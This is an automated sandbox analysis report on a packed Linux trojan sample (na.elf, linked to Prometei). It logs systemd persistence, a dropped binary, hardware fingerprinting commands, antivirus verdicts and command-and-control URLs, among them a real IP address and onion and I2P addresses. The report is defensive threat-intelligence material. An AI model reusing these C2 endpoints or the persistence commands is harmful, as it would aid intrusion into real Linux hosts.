      Source: classification engineClassification label: mal100.troj.evad.linELF@0/13@2/0

      Data Obfuscation

      barindex
      Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
      Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
      Source: initial sampleString containing UPX found: $Id: UPX 4.24 Copyright (C) 1996-2024 the UPX Team. All Rights Reserved. $
      Source: /usr/bin/pidof (PID: 6241)Directory: //.Jump to behavior
      Source: /usr/bin/pidof (PID: 6255)Directory: //.Jump to behavior
      Source: /usr/bin/gpg (PID: 6297)File: /var/lib/fwupd/gnupg/.#lk0x000055ea7eb5bb80.galassia.6297Jump to behavior
      Source: /lib/systemd/systemd-hostnamed (PID: 6298)Directory: <invalid fd (10)>/..Jump to behavior
      Source: /usr/bin/gpg (PID: 6434)File: /var/lib/fwupd/gnupg/.#lk0x00005599db685b80.galassia.6434Jump to behavior
      Source: /usr/bin/gpg (PID: 6443)File: /var/lib/fwupd/gnupg/.#lk0x000055d64eefcb80.galassia.6443Jump to behavior
      Source: /usr/bin/gpg (PID: 6464)File: /var/lib/fwupd/gnupg/.#lk0x00005575faa70b80.galassia.6464Jump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/6233/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/6233/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/1582/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/1582/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/3088/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/3088/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/230/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/230/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/110/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/110/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/231/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/231/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/111/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/111/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/232/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/232/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/1579/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/1579/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/112/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/112/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/233/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/233/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/1699/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/1699/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/113/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/113/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/234/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/234/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/1335/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/1335/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/1698/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/1698/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/114/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/114/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/235/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/235/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/1334/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/1334/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/1576/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/1576/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/2302/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/2302/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/115/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/115/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/236/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/236/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/116/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/116/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/237/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/237/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/117/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/117/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/118/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/118/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/910/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/910/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/119/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/119/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/912/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/912/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/10/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/10/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/2307/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/2307/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/11/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/11/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/918/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/918/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/12/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/12/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/13/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/13/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/14/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/14/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/15/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/15/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/16/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/16/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/17/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/17/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/18/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/18/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/1594/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/1594/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/120/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/120/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/121/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/121/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/1349/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/1349/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/1/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/1/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/122/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/122/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/243/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/243/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/123/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/123/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/2/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/2/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/124/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/124/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/3/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/3/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/4/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)File opened: /proc/4/cmdlineJump to behavior
      Source: /tmp/na.elf (PID: 6236)Shell command executed: sh -c "pgrep na.elf"Jump to behavior
      Source: /tmp/na.elf (PID: 6240)Shell command executed: sh -c "pidof na.elf"Jump to behavior
      Source: /tmp/na.elf (PID: 6244)Shell command executed: sh -c "pgrep uplugplay"Jump to behavior
      Source: /tmp/na.elf (PID: 6250)Shell command executed: sh -c "pgrep upnpsetup"Jump to behavior
      Source: /tmp/na.elf (PID: 6254)Shell command executed: sh -c "pidof upnpsetup"Jump to behavior
      Source: /tmp/na.elf (PID: 6256)Shell command executed: sh -c "systemctl daemon-reload"Jump to behavior
      Source: /tmp/na.elf (PID: 6271)Shell command executed: sh -c "systemctl enable uplugplay.service"Jump to behavior
      Source: /tmp/na.elf (PID: 6278)Shell command executed: sh -c "systemctl start uplugplay.service"Jump to behavior
      Source: /usr/sbin/uplugplay (PID: 6283)Shell command executed: sh -c "/usr/sbin/uplugplay -Dcomsvc"Jump to behavior
      Source: /usr/sbin/uplugplay (PID: 6288)Shell command executed: sh -c hostnamectlJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6294)Shell command executed: sh -c hostnamectlJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6437)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
      Source: /usr/sbin/uplugplay (PID: 6440)Shell command executed: sh -c uptimeJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6447)Shell command executed: sh -c "uname -a"Jump to behavior
      Source: /usr/sbin/uplugplay (PID: 6453)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
      Source: /usr/sbin/uplugplay (PID: 6457)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
      Source: /usr/sbin/uplugplay (PID: 6461)Shell command executed: sh -c dmidecodeJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6471)Shell command executed: sh -c uptimeJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6475)Shell command executed: sh -c "uname -a"Jump to behavior
      Source: /bin/sh (PID: 6237)Pgrep executable: /usr/bin/pgrep -> pgrep na.elfJump to behavior
      Source: /bin/sh (PID: 6245)Pgrep executable: /usr/bin/pgrep -> pgrep uplugplayJump to behavior
      Source: /bin/sh (PID: 6251)Pgrep executable: /usr/bin/pgrep -> pgrep upnpsetupJump to behavior
      Source: /usr/bin/dash (PID: 6211)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.ROSySM6ZUJ /tmp/tmp.PQ2NMYibax /tmp/tmp.YEeAFkFkYwJump to behavior
      Source: /usr/bin/dash (PID: 6220)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.ROSySM6ZUJ /tmp/tmp.PQ2NMYibax /tmp/tmp.YEeAFkFkYwJump to behavior
      Source: /bin/sh (PID: 6257)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
      Source: /bin/sh (PID: 6272)Systemctl executable: /usr/bin/systemctl -> systemctl enable uplugplay.serviceJump to behavior
      Source: /bin/sh (PID: 6279)Systemctl executable: /usr/bin/systemctl -> systemctl start uplugplay.serviceJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6284)Reads from proc file: /proc/cpuinfoJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6284)Reads from proc file: /proc/statJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6284)Reads from proc file: /proc/meminfoJump to behavior
      Source: /tmp/na.elf (PID: 6233)File: /usr/sbin/uplugplay (bits: -v usr: x grp: x all: r)Jump to behavior
      Source: /tmp/na.elf (PID: 6233)File written: /usr/sbin/uplugplayJump to dropped file
      Source: submitted sampleStderr: Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.: exit code = 0

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: /tmp/na.elf (PID: 6233)File: /usr/sbin/uplugplayJump to dropped file
      Source: /bin/sh (PID: 6441)Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboardJump to behavior
      Source: /bin/sh (PID: 6454)Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboardJump to behavior
      Source: /bin/sh (PID: 6458)Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboardJump to behavior
      Source: /bin/sh (PID: 6462)Dmidecode executable: /usr/sbin/dmidecode dmidecodeJump to behavior
      Source: /tmp/na.elf (PID: 6233)File: /tmp/na.elfJump to behavior
      Source: na.elfSubmission file: segment LOAD with 7.6054 entropy (max. 8.0)
      Source: na.elfSubmission file: segment LOAD with 7.943 entropy (max. 8.0)
      Source: uplugplay.32.drDropped file: segment LOAD with 7.6054 entropy (max. 8.0)
      Source: uplugplay.32.drDropped file: segment LOAD with 7.943 entropy (max. 8.0)
      Source: /usr/sbin/uplugplay (PID: 6284)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
      Source: /usr/bin/pgrep (PID: 6237)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6245)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6284)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/uptime (PID: 6444)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/uptime (PID: 6472)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /tmp/na.elf (PID: 6233)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/sbin/uplugplay (PID: 6280)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/sbin/uplugplay (PID: 6284)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/bin/uname (PID: 6448)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/bin/uname (PID: 6476)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/bin/gpg (PID: 6297)Queries kernel information via 'uname': Jump to behavior
      Source: /lib/systemd/systemd-hostnamed (PID: 6298)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/bin/gpg (PID: 6434)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/bin/gpg (PID: 6443)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/bin/gpg (PID: 6464)Queries kernel information via 'uname': Jump to behavior

      Language, Device and Operating System Detection

      barindex
      Source: /bin/sh (PID: 6441)Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboardJump to behavior
      Source: /bin/sh (PID: 6454)Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboardJump to behavior
      Source: /bin/sh (PID: 6458)Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboardJump to behavior
      Source: /bin/sh (PID: 6462)Dmidecode executable: /usr/sbin/dmidecode dmidecodeJump to behavior
      Source: /bin/sh (PID: 6448)Uname executable: /usr/bin/uname -> uname -aJump to behavior
      Source: /bin/sh (PID: 6476)Uname executable: /usr/bin/uname -> uname -aJump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting
      Valid AccountsWindows Management Instrumentation1
      Systemd Service
      1
      Systemd Service
      1
      Masquerading
      1
      OS Credential Dumping
      1
      Security Software Discovery
      Remote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      Scripting
      Boot or Logon Initialization Scripts1
      File and Directory Permissions Modification
      LSASS Memory14
      System Information Discovery
      Remote Desktop ProtocolData from Removable Media1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      Hidden Files and Directories
      Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Obfuscated Files or Information
      NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
      File Deletion
      LSA SecretsInternet Connection DiscoverySSHKeylogging1
      Proxy
      Scheduled TransferData Encrypted for Impact
      No configs have been found
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Number of created Files
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1653283 Sample: na.elf Startdate: 01/04/2025 Architecture: LINUX Score: 100 77 152.36.128.18, 58304, 58306, 80 NCRENUS United States 2->77 79 109.202.202.202, 80 INIT7CH Switzerland 2->79 81 6 other IPs or domains 2->81 83 Suricata IDS alerts for network traffic 2->83 85 Malicious sample detected (through community Yara rule) 2->85 87 Antivirus detection for dropped file 2->87 89 4 other signatures 2->89 11 systemd uplugplay 2->11         started        13 dash rm na.elf 2->13         started        17 dash rm 2->17         started        19 16 other processes 2->19 signatures3 process4 file5 21 uplugplay 11->21         started        73 /usr/sbin/uplugplay, ELF 13->73 dropped 93 Found Tor onion address 13->93 95 Drops files in suspicious directories 13->95 97 Sample deletes itself 13->97 23 na.elf sh 13->23         started        25 na.elf sh 13->25         started        27 na.elf sh 13->27         started        29 5 other processes 13->29 signatures6 process7 process8 31 uplugplay sh 21->31         started        33 sh pgrep 23->33         started        35 sh pidof 25->35         started        37 sh pgrep 27->37         started        39 sh pgrep 29->39         started        41 sh pidof 29->41         started        43 sh systemctl 29->43         started        45 2 other processes 29->45 process9 47 sh uplugplay 31->47         started        file10 75 /etc/CommId, ASCII 47->75 dropped 50 uplugplay sh 47->50         started        52 uplugplay sh 47->52         started        54 uplugplay sh 47->54         started        56 7 other processes 47->56 process11 process12 58 sh dmidecode 50->58         started        61 sh dmidecode 52->61         started        63 sh dmidecode 54->63         started        65 sh dmidecode 56->65         started        67 sh hostnamectl 56->67         started        69 sh hostnamectl 56->69         started        71 4 other processes 56->71 signatures13 91 Executes the "dmidecode" command for reading DMI BIOS info like hardware or serial numbers (indicative of machine fingerprinting or VM-detection) 58->91
      SourceDetectionScannerLabelLink
      na.elf37%VirustotalBrowse
      na.elf47%ReversingLabsLinux.Trojan.Generic
      na.elf100%AviraLINUX/GM.Agent.JQ
      SourceDetectionScannerLabelLink
      /usr/sbin/uplugplay100%AviraLINUX/GM.Agent.JQ
      /usr/sbin/uplugplay47%ReversingLabsLinux.Trojan.Generic
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://152.36.128.18/cgi-bin/p.cgi?r=18&i=TO32433452U81Q0F100%Avira URL Cloudmalware

      Download Network PCAP: filteredfull

      NameIPActiveMaliciousAntivirus DetectionReputation
      xinchaodbcfda.net
      unknown
      unknownfalse
        high
        xinchaodbcfda.com
        unknown
        unknownfalse
          high
          NameMaliciousAntivirus DetectionReputation
          http://152.36.128.18/cgi-bin/p.cgi?r=18&i=TO32433452U81Q0Ftrue
          • Avira URL Cloud: malware
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onina.elf, 6233.1.000000000052d000.0000000001575000.rw-.sdmpfalse
            high
            http://upx.sf.netna.elf, uplugplay.32.drfalse
              high
              http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgina.elf, 6233.1.000000000052d000.0000000001575000.rw-.sdmpfalse
                high
                https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgina.elf, 6233.1.000000000052d000.0000000001575000.rw-.sdmpfalse
                  high
                  http://152.36.128.18/cgi-bin/p.cgina.elf, 6233.1.000000000052d000.0000000001575000.rw-.sdmpfalse
                    high
                    http://dummy.zero/cgi-bin/prometei.cgina.elf, 6233.1.000000000052d000.0000000001575000.rw-.sdmpfalse
                      high
                      http://152.36.128na.elf, uplugplay.32.drfalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        54.171.230.55
                        unknownUnited States
                        16509AMAZON-02USfalse
                        199.232.90.49
                        unknownUnited States
                        54113FASTLYUSfalse
                        152.36.128.18
                        unknownUnited States
                        81NCRENUStrue
                        109.202.202.202
                        unknownSwitzerland
                        13030INIT7CHfalse
                        91.189.91.43
                        unknownUnited Kingdom
                        41231CANONICAL-ASGBfalse
                        91.189.91.42
                        unknownUnited Kingdom
                        41231CANONICAL-ASGBfalse
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        54.171.230.55na.elfGet hashmaliciousPrometeiBrowse
                          na.elfGet hashmaliciousPrometeiBrowse
                            na.elfGet hashmaliciousPrometeiBrowse
                              na.elfGet hashmaliciousPrometeiBrowse
                                eehah4.elfGet hashmaliciousUnknownBrowse
                                  vejfa5.elfGet hashmaliciousUnknownBrowse
                                    na.elfGet hashmaliciousPrometeiBrowse
                                      na.elfGet hashmaliciousPrometeiBrowse
                                        efefa7.elfGet hashmaliciousMiraiBrowse
                                          na.elfGet hashmaliciousPrometeiBrowse
                                            199.232.90.49na.elfGet hashmaliciousPrometeiBrowse
                                              eehah4.elfGet hashmaliciousUnknownBrowse
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                  rjfe686.elfGet hashmaliciousUnknownBrowse
                                                    efjepc.elfGet hashmaliciousUnknownBrowse
                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                        sh4.elfGet hashmaliciousMiraiBrowse
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                              l7vmra.elfGet hashmaliciousUnknownBrowse
                                                                152.36.128.18na.elfGet hashmaliciousPrometeiBrowse
                                                                • 152.36.128.18/cgi-bin/p.cgi?r=21&i=0KXA3CKB50Y3FZ2G
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 152.36.128.18/cgi-bin/p.cgi?r=34&i=12U3IZI3463W5DSU
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 152.36.128.18/cgi-bin/p.cgi?r=17&i=N48XL6065T20KG1X
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 152.36.128.18/cgi-bin/p.cgi?r=16&i=MPGSO2M02W5JRD29
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 152.36.128.18/cgi-bin/p.cgi?r=15&i=2C8LIU4UMPY4V9GX
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 152.36.128.18/cgi-bin/p.cgi?r=8&i=ZW3EY4C9I7EDT939
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 152.36.128.18/cgi-bin/p.cgi?r=12&i=20O993GZ608TF2LT
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 152.36.128.18/cgi-bin/p.cgi?r=12&i=NMW2TB4FP3N0TG7X
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 152.36.128.18/cgi-bin/p.cgi?r=12&i=C33JTXWA1V1X43MY
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 152.36.128.18/cgi-bin/p.cgi?r=8&i=BCV9G8J5W1ENJ0IY
                                                                109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                                                                • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                                                                No context
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                CANONICAL-ASGBrjfe686.elfGet hashmaliciousUnknownBrowse
                                                                • 91.189.91.42
                                                                vejfa5.elfGet hashmaliciousUnknownBrowse
                                                                • 91.189.91.42
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 91.189.91.42
                                                                vjwe68k.elfGet hashmaliciousUnknownBrowse
                                                                • 91.189.91.42
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 91.189.91.42
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 91.189.91.42
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 91.189.91.42
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 91.189.91.42
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 91.189.91.42
                                                                pspc.elfGet hashmaliciousMiraiBrowse
                                                                • 91.189.91.42
                                                                AMAZON-02USvejfa5.elfGet hashmaliciousUnknownBrowse
                                                                • 34.249.145.219
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                • 54.171.230.55
                                                                https://snmk9.mjt.lu/lnk/AbwAACYavtgAAAAAAAAAA9w61AIAAYKJhcUAAAAAAC6lwQBn6to4aszawEFKTWWSkCgledCSEgAq1OY/1/JgYawQoManMiPR4Ur62Q1g/aHR0cHM6Ly9vYXV0aC5neXlwb28uY29tLwGet hashmaliciousUnknownBrowse
                                                                • 75.2.57.54
                                                                https://snmk9.mjt.lu/lnk/AbwAACYajBAAAAAAAAAAA9w61AIAAYKJhcUAAAAAAC6lwQBn6tiXbUiJAxA3R5mF3vZc6uW8YAAq1OY/1/0kE4ayVm1To7Nm4xnq4WgQ/aHR0cHM6Ly9vYXV0aC5qZW5rZWQuY29tLwGet hashmaliciousUnknownBrowse
                                                                • 75.2.57.54
                                                                https://1hpkhoi.elnk7.com/9acea2a1c7dc1956b0893779c3ec4a0fhGet hashmaliciousUnknownBrowse
                                                                • 3.162.103.96
                                                                https://lambda.appcues.net/api/test-mode-redirect?accountId=220136&draftFlowId=540734d2-aafb-43cc-83ea-71d48d56263bGet hashmaliciousUnknownBrowse
                                                                • 3.162.125.53
                                                                https://snmk9.mjt.lu/lnk/AbwAACYavtgAAAAAAAAAA9w61AIAAYKJhcUAAAAAAC6lwQBn6to4aszawEFKTWWSkCgledCSEgAq1OY/1/JgYawQoManMiPR4Ur62Q1g/aHR0cHM6Ly9vYXV0aC5neXlwb28uY29tLwGet hashmaliciousUnknownBrowse
                                                                • 108.138.128.83
                                                                https://snmk9.mjt.lu/lnk/AbwAACYavtgAAAAAAAAAA9w61AIAAYKJhcUAAAAAAC6lwQBn6to4aszawEFKTWWSkCgledCSEgAq1OY/1/JgYawQoManMiPR4Ur62Q1g/aHR0cHM6Ly9vYXV0aC5neXlwb28uY29tLwGet hashmaliciousUnknownBrowse
                                                                • 108.138.128.83
                                                                https://snmk9.mjt.lu/lnk/AbwAACYajBAAAAAAAAAAA9w61AIAAYKJhcUAAAAAAC6lwQBn6tiXbUiJAxA3R5mF3vZc6uW8YAAq1OY/1/0kE4ayVm1To7Nm4xnq4WgQ/aHR0cHM6Ly9vYXV0aC5qZW5rZWQuY29tLwGet hashmaliciousUnknownBrowse
                                                                • 3.167.112.15
                                                                vjwe68k.elfGet hashmaliciousUnknownBrowse
                                                                • 34.249.145.219
                                                                INIT7CHrjfe686.elfGet hashmaliciousUnknownBrowse
                                                                • 109.202.202.202
                                                                vejfa5.elfGet hashmaliciousUnknownBrowse
